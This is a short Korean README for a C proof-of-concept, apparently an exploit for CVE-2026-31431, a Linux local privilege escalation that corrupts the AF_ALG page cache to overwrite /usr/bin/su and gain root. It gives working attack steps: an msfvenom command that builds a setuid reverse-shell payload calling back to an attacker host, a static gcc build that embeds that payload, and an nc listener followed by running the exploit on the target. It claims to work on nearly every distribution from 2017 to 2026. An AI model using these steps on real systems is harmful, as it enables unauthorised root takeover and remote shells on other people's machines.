
CVE-2026-31431에 대한 C PoC로, AF_ALG 페이지 캐시 손상을 악용하여 /usr/bin/su를 덮어쓰고 루트 권한을 획득하는 비특권 Linux LPE입니다.
AF_ALG의 로직 버그(커널 4.14 → 2026년 초)를 통해 읽기 가능한 모든 파일의 페이지 캐시에 제어된 4바이트를 기록하는, 권한이 없는 간단한 LPE입니다.
메모리 내의 /usr/bin/su를 손상시킨 후 실행하면 → root 권한 획득.

# 1. ELF 페이로드 생성 (리버스 셸 예시)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86
# 2. 컴파일 (정적, 스트립, .incbin을 통해 페이로드 내장)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c
# 3. 먼저 리스너 실행 (nc -lvp <LPORT>), 그 다음 대상 호스트에서 익스플로잇 실행
./copy_fail_x86
• CVE: CVE-2026-31431 • CVSS: 7.8 • 수정: 커밋 a664bf3d603d
• 2017–2026년의 사실상 모든 Linux 배포판에서 동작 (컨테이너 포함).
• 기법: /usr/bin/su를 O_RDONLY로 열고, AEAD 제자리 복호화를 악용하여 VFS를 우회하고 제작된 페이로드를 페이지 캐시에 직접 스플라이스.
• 원본 공개 및 732바이트 Python PoC → https://copy.fail
MIT – LICENSE 참조. 교육 및 승인된 테스트 용도로만 사용하세요. 사용에 따른 책임은 본인에게 있습니다.